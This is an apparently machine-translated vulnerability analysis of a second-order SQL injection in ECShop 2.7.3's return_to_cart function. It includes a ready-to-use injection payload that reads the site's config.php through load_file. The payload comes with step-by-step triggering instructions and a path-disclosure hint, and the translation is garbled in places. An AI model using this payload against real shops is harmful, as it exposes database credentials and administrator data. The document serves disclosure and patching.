Ecshop 2.73 lib_transaction.php file secondary SQL Injection Vulnerability Analysis

Thank you for your contribution to mogujie.com.
 
One secondary injection, insert type, can directly read the database administrator Information
Usage process: Find a product to purchase, modify the value2 'of the color radio button), ('6', 'c4598c001520.d28cfcb267fffc750fd', '13', 'ecs000013 ′, mid (load_file ('C:/wamp/www/ec/data/config. php '), 70,120), '123. 20', '100', '3', ", '1',", '0', '0', '0', '100')-
 

Save, settle, submit the order, go to the user center, find the order, open, and click "put back to shopping cart"

 
The injection has been triggered. Let's go to the shopping cart.


Database information.
Involved version: ECShop_V2.7.3_UTF8_release1106 whether to log on: whether to use the default configuration: whether to use the code: code
Vulnerability details:
A brute-force Path Vulnerability is provided to help us obtain the physical location of the Database Configuration File/install/templates/active. php
Cause of the vulnerability: \ mongodes \ lib_transaction.php function return_to_cart ($ order_id). Check the following code.
// The item to return to the shopping cart

 $return_goods = array( 'goods_id' => $row['goods_id'], 'goods_sn' => addslashes($goods['goods_sn']), 'goods_name' => addslashes($goods['goods_name']), 'market_price' => $goods['market_price'], 'goods_price' => $goods['goods_price'], 'goods_number' => $row['goods_number'], 'goods_attr' => empty($row['goods_attr']) ? '' : addslashes($row['goods_attr']), 'goods_attr_id' => empty($row['goods_attr_id']) ? '' : $row['goods_attr_id'], 'is_real' => $goods['is_real'], 'extension_code'=> addslashes($goods['extension_code']), 'parent_id' => '0', 'is_gift' => '0', 'rec_type' => CART_GENERAL_GOODS );

 
Goods_attr_id, which is obtained from the database, is the illegal data stored in the previous order submitted, here, $ GLOBALS ['db']-> autoExecute ($ GLOBALS ['ecs']-> table ('cart '), $ return_goods, 'insert ');